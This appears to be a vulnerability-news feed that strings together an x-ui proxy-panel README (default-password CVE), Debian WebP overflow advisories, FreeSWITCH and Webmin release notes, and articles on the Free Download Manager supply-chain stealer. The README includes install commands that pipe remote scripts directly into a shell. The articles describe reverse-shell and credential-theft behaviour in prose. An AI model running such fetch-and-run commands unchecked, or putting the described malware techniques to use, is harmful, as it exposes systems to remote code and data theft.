An issue in xui-xray v1.8.3 allows attackers to obtain sensitive information via default password.

**x-ui**

支持多协议多用户的 xray 面板

**功能介绍**

*   系统状态监控
*   支持多用户多协议，网页可视化操作
*   支持的协议：vmess、vless、trojan、shadowsocks、dokodemo-door、socks、http
*   支持配置更多传输配置
*   流量统计，限制流量，限制到期时间
*   可自定义 xray 配置模板
*   支持 https 访问面板（自备域名 + ssl 证书）
*   支持一键SSL证书申请且自动续签
*   更多高级配置项，详见面板

**安装&升级**

    bash <(curl -Ls https://raw.githubusercontent.com/vaxilu/x-ui/master/install.sh)
    

**手动安装&升级**

1.  首先从 https://github.com/vaxilu/x-ui/releases 下载最新的压缩包，一般选择 amd64架构
2.  然后将这个压缩包上传到服务器的 /root/目录下，并使用 root用户登录服务器

> 如果你的服务器 cpu 架构不是 amd64，自行将命令中的 amd64替换为其他架构

    cd /root/
    rm x-ui/ /usr/local/x-ui/ /usr/bin/x-ui -rf
    tar zxvf x-ui-linux-amd64.tar.gz
    chmod +x x-ui/x-ui x-ui/bin/xray-linux-* x-ui/x-ui.sh
    cp x-ui/x-ui.sh /usr/bin/x-ui
    cp -f x-ui/x-ui.service /etc/systemd/system/
    mv x-ui/ /usr/local/
    systemctl daemon-reload
    systemctl enable x-ui
    systemctl restart x-ui
    

**使用docker安装**

> 此 docker 教程与 docker 镜像由Chasing66提供

1.  安装docker

curl -fsSL https://get.docker.com | sh

2.  安装x-ui

mkdir x-ui && cd x-ui
docker run -itd --network=host \\
    -v $PWD/db/:/etc/x-ui/ \\
    -v $PWD/cert/:/root/cert/ \\
    --name x-ui --restart=unless-stopped \\
    enwaiax/x-ui:latest

> Build 自己的镜像

**SSL证书申请**

> 此功能与教程由FranzKafkaYu提供

脚本内置SSL证书申请功能，使用该脚本申请证书，需满足以下条件:

*   知晓Cloudflare 注册邮箱
*   知晓Cloudflare Global API Key
*   域名已通过cloudflare进行解析到当前服务器

获取Cloudflare Global API Key的方法:  

使用时只需输入 域名, 邮箱, API KEY即可，示意图如下： 

注意事项:

*   该脚本使用DNS API进行证书申请
*   默认使用Let'sEncrypt作为CA方
*   证书安装目录为/root/cert目录
*   本脚本申请证书均为泛域名证书

**Tg机器人使用（开发中，暂不可使用）**

> 此功能与教程由FranzKafkaYu提供

X-UI支持通过Tg机器人实现每日流量通知，面板登录提醒等功能，使用Tg机器人，需要自行申请 具体申请教程可以参考博客链接 使用说明:在面板后台设置机器人相关参数，具体包括

*   Tg机器人Token
*   Tg机器人ChatId
*   Tg机器人周期运行时间，采用crontab语法

参考语法：

*   30 \* \* \* \* \* //每一分的第30s进行通知
*   @hourly //每小时通知
*   @daily //每天通知（凌晨零点整）
*   @every 8h //每8小时通知

TG通知内容：

*   节点流量使用
*   面板登录提醒
*   节点到期提醒
*   流量预警提醒

更多功能规划中...

**建议系统**

*   CentOS 7+
*   Ubuntu 16+
*   Debian 8+

**常见问题****从 v2-ui 迁移**

首先在安装了 v2-ui 的服务器上安装最新版 x-ui，然后使用以下命令进行迁移，将迁移本机 v2-ui 的 所有 inbound 账号数据至 x-ui，面板设置和用户名密码不会迁移

> 迁移成功后请 关闭 v2-ui并且 重启 x-ui，否则 v2-ui 的 inbound 会与 x-ui 的 inbound 会产生 端口冲突

**issue 关闭**

各种小白问题看得血压很高

**Stargazers over time**

CVE-2023-41595: GitHub - vaxilu/x-ui: 支持多协议多用户的 xray 面板

Debian Linux Security Advisory 5497-2 - A buffer overflow in parsing WebP images may result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5497-2                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 17, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libwebpCVE ID         : CVE-2023-4863A buffer overflow in parsing WebP images may result in the execution ofarbitrary code.For the oldstable distribution (bullseye), this problem has been fixed inversion 0.6.1-2.1+deb11u2.We recommend that you upgrade your libwebp packages.For the detailed security status of libwebp please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libwebpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUHGqwACgkQEMKTtsN8TjbjJg/8D6kWp8jPOWah87ULZ4P14ehOQ98a1IUoQ2hyiLx+qrmAXkKNQE/pzSjnCFhXgXq/ILf8ux7bB9MzA3gr3nVukVoh6BDw6swuZTPUL21/35tKwTRQQFOq3DHyuPrEYt6Zxt56s4Cf2977ciTJkw9Xbe0KstsL/0DSteFJ39xckA57WeGXzPoRyXf5RPPCbuA3WDAJcBIsNzXVGern0YNTk0uqOlk+yMVmazPbKMGr0ZoBUvT4VktHia9A1j6UuEFcGXjAHkdiKHYKUCEZVWLwOHRot0z5j5fRY2uTJA47DnIeNqJTSyvc/uaLWjf7Qe2ivl0L4N+MdnI1AlQ5YkdEgry+mzkzs4ZqJs/zkQFxa0mq7t3npZNY5tL2YyA9dA5Yj1sicCCj4igGYMEFetQphl+EbUNPyDiL8P2ONekHdy+fHXewNQAjMO5NV4Q9nUbU/tWCdMGLNP0QV9LDBYp5T3SQVszJh/vZywjYlDOaBr6M9ILI+Xe/XqSEoKg/QOq99CSulDJbUWBg/VGOxferdmJOxZJhH5/Gjy6gFPD98wo27xVqV2rYuHcf17trHMSFUWEnuD0HXyeCdn2b1MUCA6x+lMcYwfi6ugxIxjAzw70z4QLYApOkDjdNaPIzwX7REgNabyyDqzxoacXs6BdYpivpo314MDnQC0rnsorX9uw==i6o4-----END PGP SIGNATURE-----

Debian Security Advisory 5497-2

Debian Linux Security Advisory 5498-1 - A buffer overflow in parsing WebP images may result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5498-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 15, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-4863

A buffer overflow in parsing WebP images may result in the execution of  
arbitrary code.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:102.15.1-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 1:102.15.1-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUEiL0ACgkQEMKTtsN8  
TjbzXg//dJUP1BvQEumTaK+cdEgoGWyRiGDu7ufzX4q89VTy/eY6nAYlHrCnAeFX  
OYTVqrLQ6eRZzK9YqXss+tzGtpGaKgwxvXTN28SRPQ+i44BkRcdb+2HIFHUMKeda  
ArrLZDxUCbcTkWj2FXHSPj7LOxW1+CC+Rxvy4HWkjqOMwsg0PfRzgtCkcivYGE6h  
2GuJnNStBxc01ClJAJ0+DT8FnRrAvE6e4Q0IU/22qoUYQ1en69Fgjfk9SlxV/IEb  
aPz5/GXMduyLsbCMY1rZcDynhwl9kux1cteJ5nFDaJq9/Uy8lfUe/H01aKGBcAGA  
dUtnZd3wffkwLAFShm74T0WNqAh2/1FNMoSchCi7Dxf117VnM/YYqUjcsQFuG9Lt  
l971IcyPficH7U2Co9fRcIl6NBwzpHQLa3bbO8+fK24G/uSCl4GjbE15Qs3vDFRc  
Aqag+ToyM2zw8DLNDpXu+YF0L9D7Vjfd5MWIQDIcKOLBhc9Dfndv7AVlWSHCWGL7  
1Utpu506fwUC0wnxayP/Jp6tfv+OpVnKESkOynPKZuu8HU8k4tsiMP5t5KCuUy+B  
rugAfWN1DOhObHjVisyDWyyoUs4MBkDNYgx9M4WSLSQ8hRWCbcHzTplfPJCiNuFk  
1z0nVtkayHcUlCJYESVLuaL2QsWnzkKK4Kvyu4n/5QpWGR031oM=  
=iDYA  
-----END PGP SIGNATURE-----

Debian Security Advisory 5498-1

FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID. When an SDP is offered with any ICE candidates with an unknown component ID, FreeSWITCH will make an out of bounds write to its  arrays. By abusing this vulnerability, an attacker is able to corrupt FreeSWITCH memory leading to an undefined behavior of the system or a crash of it. Version 1.10.10 contains a patch for this issue.

**This is a major release containing critical security fixes, adding Debian 12 Bookworm, OpenSSL 3 and FFmpeg5 support. As part of our continuing dedication to code quality, we have resolved static analysis bugs for MacOS in all of FreeSWITCH core and in most modules. We encourage all users to upgrade to v1.10.10 whenever possible.**

     Release Notes - FreeSWITCH - Version 1.10.10
    

**Enhancement**

*   \[Build-System\] Add Debian 12 Bookworm support
*   \[Build-System\] Update libks and signalwire-c requirements to 2.0
*   \[Build-System\] Windows: Update OpenSSL to 1.1.1t, libpq to 10.23, curl to 7.88.0, rabbitmq-c to 0.13.0. Allow using build numbers and bump libks version requirement to 1.8.2\_1 and signalwire-c to 1.3.2\_1 compiled with openssl 1.1.1t
*   \[Core, mod\_cidlookup, mod\_curl, mod\_httapi, mod\_http\_cache, mod\_kazoo, mod\_shout\] Add new switch\_curl\_mime APIs replacing switch\_curl\_process\_form\_post\_params() and make code be compatible with libcurl>=7.87.0
*   \[core, mod\_opus\] bring more fmtp params to core (offer/answer).
*   \[core, mod\_opus\] more elastic jitterbuffer with Opus codec
*   \[core,mod\_av,unit-tests\] Make transition to core packetizer
*   \[Core\] Add new cause REJECT\_ALL
*   \[Core\] Add new switch\_channel\_get\_variable\_strdup() and switch\_channel\_get\_variable\_buf() APIs that avoid allocating channel variables in a session's memory pool.
*   \[core\] Add switch\_core\_media\_get\_engine() and switch\_core\_media\_get\_codec() functions
*   \[Core\] OpenSSL 3 support
*   \[core\] switch\_ivr\_originate set originate endpoint used
*   \[mod\_amqp\] Event subclass support
*   \[mod\_av\] Add FFmpeg 5.1.3 support on Windows.
*   \[mod\_av\] Migrate to FFmpeg 5.1
*   \[mod\_conference\] Add flag to destroy the conference only when all mandatory members disconnect. And set endconf to end the conference when any member with the flag disconnects
*   \[mod\_rtmp\] Add OpenSSL 3 support.
*   \[mod\_shout\] Enable module in Dockerfile example.
*   \[mod\_shout\] Replace deprecated meta functions with shout\_set\_meta()
*   \[mod\_sofia\] Ignore user agent for display update when channel variable update\_ignore\_ua is true
*   \[mod\_sofia\] Map SWITCH\_CAUSE\_REJECT\_ALL cause to 603
*   \[mod\_verto\] Add context into msg event header
*   Bump sofia-sip library requirement to version 1.13.15
*   Create SECURITY.md

**Bug**

*   \[Build-System\] Update commit hash of SpanDSP on Windows.
*   \[Configuration\] Update freeswitch.xml
*   \[core, mod\_cidlookup\] Free memory allocated via strdup
*   \[Core, mod\_mariadb, mod\_ilbc\] Fix build on gcc 12.
*   \[Core, mod\_opus\] Fixes.
*   \[core,libyuv,modules\] Fix function declarations without a prototype
*   \[core,miniupnpc,modules\] Fix not used variables
*   \[Core\] check\_ice: sanitize second field of the candidates. Add new switch\_is\_uint\_in\_range() API.
*   \[core\] Coverity fixes
*   \[Core\] Fix greedy\_sort for codecs containing different fmtp
*   \[Core\] Fix missing MEDIA\_PARAMS in message\_names.
*   \[Core\] Fix missing mutex unlock in switch\_ivr\_dmachine\_ping()
*   \[Core\] Fix possible deadlock in switch\_core\_media\_set\_codec()
*   \[Core\] Fix race condition of session\_table hash in switch\_core\_session\_request\_uuid()
*   \[Core\] Fix switch\_console.c for Galera Mariadb cluster
*   \[Core\] Fix switch\_core\_sqldb\_destroy() function declaration.
*   \[Core\] ICE: fix wrong buffer size being passed and unitialized buffer
*   \[core\] Opus RTP timestamp: adding an exception on RTP session creation.
*   \[Core\] Remove unused count variable from switch\_core\_session\_execute\_exten()
*   \[Core\] Sanitize match count during negotiation
*   \[Core\] switch\_curl\_process\_mime(): fix build on older systems.
*   \[core\] Use auto DH params with openssl3
*   \[Documentation\] Fix typo in README.md
*   \[mod\_amqp\] Coverity CID 1468426 (Resource leak)
*   \[mod\_amr\] coverity CID 1395603 (Unsigned compared against 0)
*   \[mod\_av\] Coverity CID 1500320 (Resource leak)
*   \[mod\_avmd\] coverity CID 1395555 (Dereference before null check)
*   \[mod\_avmd\] Coverity fixes
*   \[mod\_callcenter\] Fix stale agents and UUID broadcasts
*   \[mod\_commands\] add completions for fsctl api\_expansion and sync\_clock\_when\_idle
*   \[mod\_commands\] Fix and improve coalesce function
*   \[mod\_commands\] Fix leaking session readlock in uuid\_capture\_text
*   \[mod\_conference\] handle personal canvas with vmuted member
*   \[mod\_dialplan\_asterisk\] Coverity CID 1214207 (Resource leak)
*   \[mod\_dptools\] coverity CID 1468646 (Unsigned compared against 0)
*   \[mod\_enum\] Fix use-after-free if creating resolver from file failed
*   \[mod\_erlang\_event\] coverity CID 1500239 (Uninitialized scalar variable)
*   \[mod\_event\_multicast\] Coverity CID 1468504 (Resource leak)
*   \[mod\_event\_multicast\] Few fixes
*   \[mod\_imagick\] Coverity CID 1500258 (Resource leak)
*   \[mod\_java\] Coverity CID 1320752 (Resource leak)
*   \[mod\_java\] Coverity CID 1320753 (Resource leak)
*   \[mod\_kazoo\] Coverity fixes
*   \[mod\_ladspa\] Added activate/deactivate support.
*   \[mod\_logfile\] add logfile open error log and fixes a missing \\n
*   \[mod\_mariadb\] Fix "DeadLock. The retries are over." message.
*   \[mod\_opus\] coverity CID 1320733 (Result is not floating-point)
*   \[mod\_opus\] Fix buf scope in switch\_opus\_decode().
*   \[mod\_opus\] fix configuration glitches (switch\_true() instead of atoi()).
*   \[mod\_opus\] fix samples\_per\_packet for 8khz, 16khz, 24khz.
*   \[mod\_opus\] show uuid in ERROR/DEBUG logs.
*   \[mod\_opusfile\] coverity CID 1468424 (Missing break in switch)
*   \[mod\_opusfile\] Fix missing rdlock unlock in switch\_opusfile\_open()
*   \[mod\_pgsql\] Coverity CID 1468401 (Resource leak)
*   \[mod\_png\] Fix unexpected png video blocked read
*   \[mod\_portaudio\] coverity CID 1024263 (Dereference before null check)
*   \[mod\_python3\] Fix build on Python 3.10+
*   \[mod\_radius\_cdr\] Coverity CID 1395529 (Resource leak)
*   \[mod\_rayo\] Coverity CID 1395579 (Resource leak)
*   \[mod\_say\_en\] change epoch to 64 bit int
*   \[mod\_signalwire\] Make this module working with libks and signalwire-c in versions 2.0
*   \[mod\_skinny\] Fix build on Debian 12: error: array subscript 'skinny\_message\_t {aka struct skinny\_message}\[0\]' is partly outside array bounds
*   \[mod\_sofia\] coverity CID 1468496 (Unchecked return value)
*   \[mod\_sofia\] Coverity fixes
*   \[mod\_sofia\] fix sofia\_glue\_get\_extra\_headers memory leak
*   \[mod\_sofia\] Randomize OPTIONS Ping interval
*   \[mod\_sofia\] Remove non-implemented verbose feature
*   \[mod\_spandsp\] Coverity CID 1024263 (Dereference before null check)
*   \[mod\_translate\] Coverity CID 1301006 (Resource leak)
*   \[mod\_v8\] Coverity CID 1468570 (Resource leak)
*   \[mod\_verto\] Coverity CID 1320754 (Resource leak)
*   \[mod\_verto\] Coverity fixes
*   \[mod\_verto\] Fix function declarations without a prototype
*   \[mod\_verto\] Include libks/ks.h instead of ks.h
*   \[mod\_xml\_curl\] Coverity CID 1468413 (Resource leak)
*   \[mod\_xml\_rpc\] Coverity CID 1294469 (Resource leak)
*   \[mod\_xml\_scgi\] Coverity CID 1468595 (Resource leak)
*   \[Unit-tests\] Fix possible overflows and an undefined variable in the test framework.
*   \[xmlrpc-c\] Fix MacOS build

**Installation guides**

https://developer.signalwire.com/freeswitch/FreeSWITCH-Explained/Release-Notes/FreeSWITCH-1.10.x-Release-notes\_25460878/

CVE-2023-40018: Release FreeSWITCH v1.10.10 Release · signalwire/freeswitch

By Deeba Ahmed
A free download manager site redirected some of its visitors to a malicious Debian package repository that installed a Linux Password Stealer malware as part of an extensive, longstanding supply chain attack.
This is a post from HackRead.com Read the original post: Free Download Manager Site Pushed Linux Password Stealer

Remember: There ain’t no such thing as a free lunch!

**KEY FINDINGS**

*   **A supply chain attack on the Free Download Manager website redirected some users to a malicious Debian package that installed password-stealing malware.**

*   **The malicious package was hosted on the domain “deb.fdmpkgorg” and contained a post-install script that downloaded two executables to the /var/tmp/crond and /var/tmp/bs file paths.**

*   **The crond job scheduler was used to force a document present at /var/tmp/crond to launch repeatedly at 10-minute intervals, effectively backdooring the infected systems.**

*   **The attacker then established a reverse shell to their owned server and installed a Bash stealer on the infected system.**

*   **The Bash stealer collects sensitive data such as system details, browsing history, cryptocurrency wallet files, saved passwords, and cloud services credentials.**

*   **The campaign is no longer active, but the end goals of the attackers are still unknown.**

*   **Not all users who downloaded the Free Download Manager received the malicious package, which may have helped the campaign to go undetected for so long.**

*   **This highlights the need to secure Linux desktops and server devices with effective and reliable security solutions.**

It is hard to process, yet not surprising, that a widely trusted free software download site was exposing unsuspected users to information-stealing malware for the past three years, and no one could have detected it until this week. 

According to the cybersecurity firm Kaspersky, the malicious supply chain attack remained active from 2020 to 2022 but was only recently discovered by its researchers while investigating suspicious domains.

According to Kaspersky’s blog post, a website “freedownloadmanagerorg” used to offer e legit Linux software “Free Download Manager.” Since January 2020, it started offering a benign version of this software after redirecting users to a malicious Debian package that contained a post-install script.

Researchers noted that the website redirected users to another domain “deb.fdmpkgorg,” which hosted the Debian package. The script downloaded two executables to the /var/tmp/crond and /var/tmp/bs file paths.

This script used the cron job scheduler to force a document present at /var/tmp/crond to launch repeatedly at 10 minutes intervals so that the systems that have installed this decoyed version of the Free Download Manager were backdoored permanently. For your information, crond, aka Bew, is a backdoor variant discovered in 2013.

The attacker then established a reverse shell to their owned server and installed a Bash stealer on the infected system. This stealer was previously analyzed by Yoroi in June 2019. It collects sensitive data such as system details, browsing history, cryptocurrency wallet files, saved passwords, and cloud services credentials, including AWS, Oracle Cloud Infrastructure, Google Cloud, and Azure.

After collecting these details, the malicious stealer contacts the C2 server to download an uploader binary and saves it to this path: /var/tmp/atd. This binary is then used for uploading stealer execution results to the malware operator’s infrastructure.

The screenshot shows the attack flow, the domain to which users were redirected, a YouTube video demonstrating how to download manager showing the malicious package being dropped from the site, and users complaining about the malware in 2021.

“The communication protocol is, depending on the connection type, either SSL or TCP. In the case of SSL, the crond backdoor launches the /var/tmp/bs executable and delegates all further communications to it. Otherwise, the reverse shell is created by the crond backdoor itself,” the report read.

Nevertheless, the team at Free Download Manager has apologized to its users and vowed to implement better security measures. It has also urged users to scan their system and change their passwords.

> “If you were among the subset of users who tried to download FDM for Linux from our compromised page during the mentioned timeframe, we strongly recommend conducting a malware scan on your system and updating your passwords as a precautionary measure.”
> 
> Free Download Manager team

Thankfully, this campaign isn’t active anymore. The campaign’s end goals are still under investigation. However, an interesting finding is that not all users who downloaded the Free Download Manager received the malicious package. Perhaps this is how the campaign remained undetected for so long. This highlights the growing need to secure Linux desktops and server devices with effective and reliable security solutions.

**RELATED ARTICLES**

1.  Malware hits Freelancers at Fiverr and Freelancer.com
2.  Almost Every Major Free VPN Service is a Glorified Data Farm
3.  Popular free Android VPN apps on Play Store contain malware
4.  Free WinZip trial popup vulnerability lets hackers drop malware
5.  This malware hides behind free VPN, pirated security software keys

Free Download Manager Site Pushed Linux Password Stealer

A stored cross-site scripting (XSS) vulnerability in Webmin v2.100 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cloned module name parameter.

Webmin is a web-based system administration tool for Unix-like servers, and services with about 1,000,000 yearly installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as **BIND** DNS Server, **Apache** HTTP Server, **PHP**, **MySQL**, and many more.

Add support for Amazon Linux 2023 Fix a bug in Network Configuration module when parsing network size Fix Netplan related bugs in Network Configuration module Fix a bug with initial focus in Terminal module Fix to correctly compare Webmin semantic versions Fix to suppress output from monitor.pl command Fix bugs when reading and replying to HTML email in Usermin Assets File Size File Size Webmin Usermin webmin-2.102-1.noarch.rpm 40.8 MB usermin-2....

Add support for reading gzipped email messages Add error\_stderr API Fix to show correct locale for sudo-capable users webmin/authentic-theme#1663 Fix new signing key import on Debian and derivatives Fix to check if password hash format is valid for yescrypt and SHA512 Fix print email functionality for Read User Mail module (for both Webmin and Usermin) Fix various XSS related issues Assets File Size File Size Webmin Usermin webmin-2.101-1.noarch.rpm 40.8 MB usermin-2....

Add full support for NetworkManager in Network Configuration module Add the Terminal module to Usermin Add support for WebGL in the Terminal module Add screen reader support in Terminal module Add significant improvements to read, reply and compose mail functionality Add support for loading images via the server when reading mail Add support for showing defaults for options in PHP Configuration module Add new pagination mode in Users and Groups module Fix correctly displaying bridges with Netplan in Network Configuration module Fix displaying active network interfaces in Network Configuration module Fix to consider current drive temperature in smartctl output #1881 Fix to properly stop Usermin usermin/issues/89 Fix no to add hashed password to the old password list twice Fix displaying placeholder on input to reflect strftime-style format Update Authentic theme to the latest version adding new vertical column layout Assets File Size File Size Webmin Usermin webmin-2....

Fix support for enabling and disabling the HTTP2 protocol Fix several bugs in the creation of AAAA and MX records Fix bugs in the management of secondary mail servers Fix creating mail forwards and auto-replies Add automatic use of Cloud credentials if available when backing up to S3 or GCS running on Amazon EC2 or Google Compute Engine

Add ability to host DNS zones on remote Webmin servers Add support for EC SSL certificates Add support for remote databases for PostgreSQL in the same way as MySQL Add an option to share the same DNS zone file with different owners

Add ability to set locale in Webmin Users module for consistency Fix to preserve initial install directory when upgrading manually Fix to preserve minimal install type when upgrading manually Fix an error when make\_date is called on undefined value #1860 Fix clearing packages caches before checking for updates in status collection #1863 Update the Authentic theme to the latest version Assets File Size webmin-2.021-1.noarch.rpm 39.6 MB webmin\_2.021\_all.deb 32.5 MB webmin-2....

Add full locale support Add slave zone file format option in BIND DNS module Add support for editing ACLs in File Manager Add support to configure SSL connection for MySQL/MariaDB module Add support for compressed backups in PostgreSQL module Add support for displaying inodes too in Disk Usage in the Dashboard Add better support for CloudLinux Fix to always default to RSA key type in Let’s Encrypt requests Fix setup repository script for Oracle Fix shutdown timeout to avoid termination of running processes Fix support for SpamAssassin 4 Fix to use system default hashing format for htpasswd file Fix FastRPC issues Update the Authentic theme to the latest version, with sped-up Dashboard performance Assets File Size webmin-2....

Fix Authentic theme issue with error handling Fix Framed theme to respect selected mode in left menu Assets File Size webmin-2.013-1.noarch.rpm 39.9 MB webmin\_2.013\_all.deb 32.7 MB webmin-2.013.tar.gz 44.9 MB webmin-2.013.pkg.gz 44.3 MB

Fix to set the correct algorithm when setting up RNDC #1817 Fix the loop bug when sourcing other network configs in Debian Fix to include all Debian network config files in backups Fix to stop doing expensive package re-fetch on upgrades Add support for defining hostname for WebSocket connection Add Debian 12 support Assets File Size webmin-2.012-1.noarch.rpm 39.9 MB webmin\_2.012\_all.deb 32.7 MB webmin-2.012.tar.gz 44.9 MB webmin-2.012.pkg.gz 44.3 MB

Add ability to set shell character encoding and set TERM environmental variable in the new Terminal module Add support for editing network interfaces in include files for Debian systems Add various improvements to the old good Framed Theme Fix to change Gray Framed Theme name to Framed Theme Fix to verify and close WebSocket session, if parent session was closed Fix to remove RC4 from the list of strong ciphers Fix don’t fail LDAP user or group deletion, if they have already been deleted Fix error handling in MySQL/MariaDB Database server module when executing SQL commands Fix adding an extra server attachment field and other bugs in Read User Mail module Fix the link to release notes for Rocky Linux Fix issues with freezing and thawing dynamic reverse zones in BIND DNS Server module Fix bugs for modules granting anonymous access Fix mailbox\_idle\_check\_interval option related bugs in Dovecot module sourceforge....

CVE-2023-40982: Webmin

Debian Linux Security Advisory 5497-1 - A buffer overflow in parsing WebP images may result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5497-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 13, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libwebpCVE ID         : CVE-2023-4863A buffer overflow in parsing WebP images may result in the execution ofarbitrary code.For the stable distribution (bookworm), this problem has been fixed inversion 1.2.4-0.2+deb12u1.We recommend that you upgrade your libwebp packages.For the detailed security status of libwebp please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libwebpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUCI48ACgkQEMKTtsN8TjZ6xA/+O7pTgHPsA9EqPp7kZAROOB/a7YyjqI3u3Krun6YMhf/QApCxFWWnXOu73MPDOTarFj2AUjhn6IOEIbGbHEfcr4On0BabOGnXbVpdrhwa1WN3OPxj5XChel4bXXu6H07l2mRh6K4O/m7kt630VDYu4j2eC3ZOQXhQ/+arqYAkMJN0uy9yXwSdpxnuJei0FcsTKRDb4g9qye/sHjivB7wMRic9ZLxcSRET2zd/ruUBqk0Z4S9d58qq/XzayYguOuqthelfPA8Yr7AzT/ZIrrbejDQr3h8WAfiC3a/Gx7j1y1Ll5JoOib1/AoB/fpzyboc27BjCnW0BVbCyHXmdyUK739pnqOa8XrtsBqUkEO53JesTmEVEAUlH/YVp/SR3Y7NrrSWYd52LTAkmRIpD+Qnd3cGkc7WIaPwO4nIRLj1YOaOsD5F0N8LxklO1dEoBzuGPoXlkf8FcI+64lhv9LJDcY3QkKxxiqV78B6jibW5rzLi1FFa6Alo8KE+/Wyz20XDXqN04Ni1QNc8TEE2z0Xcp1CoXjQPg0El5zQXNqmBdmBdFPjqGU6ipAnxacZAFXiYr3aGBmgVvSHtE+nPczijtFNB7f2BIS9V11EqRc+lEhzc1LrXgt+QOYW3puZaEtJKU8c7QR+khmY/HM9n5mfNulamvgNicqSKjXE07KhIBI/U==5C/b-----END PGP SIGNATURE-----

Debian Security Advisory 5497-1

Debian Linux Security Advisory 5496-1 - A buffer overflow in parsing WebP images may result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5496-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 13, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-4863

A buffer overflow in parsing WebP images may result in the execution of  
arbitrary code.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 102.15.1esr-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 102.15.1esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUCH1EACgkQEMKTtsN8  
TjZB7A//YpbXG3OOwqz3b83KzC0B2y53g1qcriYZ+PiUs+S0FNXX0ePnRJG2Txl1  
c82NjGrzTO+D+qTtj3Uj/KB2k/v9UleRE7yeqoZcZXqMgdXqWPl/2C/xNaKLdwRd  
YjtNl/KgdDPRIxozwov/fRuS6bUWOtsOpYLGtWsFCfK7Wik20TN36dJNPH+4qvgR  
/YwRV5cqpxAKnguVZoFuKyKLxAXm2KxZCOaH3Ft3f5Sk6MWWt4ayWgmrUOiRzdEB  
vu/h4itb/q/dnLB/O4u7EzFGK5TtHHpP+4YoeibI/JQD/geiAFCyBdbBSmVlLv2c  
8aUJLziUvawpE+5ig8b+7m5bwSsfCL5JNMYesVfM1joqY0ysKkwZj+WkYtfkVZQH  
SepJON7YTm9Hsbkx/WZ/RpF6VbW4/7YWcy9YN8Cevd2wQ4CSSicBpZ77MaPUgqWf  
cHCRYVKsTNLmUbDSAjKazUPbHPFNaiMEl2pG54xNfj6y4avyLnqOWmF00/kRoCG4  
EsA8LGZgrhImqzgZMPQNkEmwstjiADQ8b8himl5CCjwiy70YVm3PmYynH/SiSkow  
4/GpZsoDZZ1iWDnSQgw/8/WQ8PQFOkmMVV7wfAJ5RK6iVP3MJ7pNJEi0oY6a2SLk  
2IXg48oJF9tWiY/xq+JezTuU0zmC0P90YHz3rywvlVlXlJ/AR7M=  
=H7ya  
-----END PGP SIGNATURE-----

Debian Security Advisory 5496-1

A download manager site served Linux users malware that stealthily stole passwords and other sensitive information for more than three years as part of a supply chain attack.
The modus operandi entailed establishing a reverse shell to an actor-controlled server and installing a Bash stealer on the compromised system. The campaign, which took place between 2020 and 2022, is no longer active.
"

A download manager site served Linux users malware that stealthily stole passwords and other sensitive information for more than three years as part of a supply chain attack.

The modus operandi entailed establishing a reverse shell to an actor-controlled server and installing a Bash stealer on the compromised system. The campaign, which took place between 2020 and 2022, is no longer active.

"This stealer collects data such as system information, browsing history, saved passwords, cryptocurrency wallet files, as well as credentials for cloud services (AWS, Google Cloud, Oracle Cloud Infrastructure, Azure)," Kaspersky researchers Georgy Kucherin and Leonid Bezvershenko said.

The website in question is freedownloadmanager\[.\]org, which, according to the Russian cybersecurity firm, offers a legitimate Linux software called "Free Download Manager," but starting in January 2020, began redirecting some users who attempted to download it to another domain deb.fdmpkg\[.\]org that served a booby-trapped Debian package.

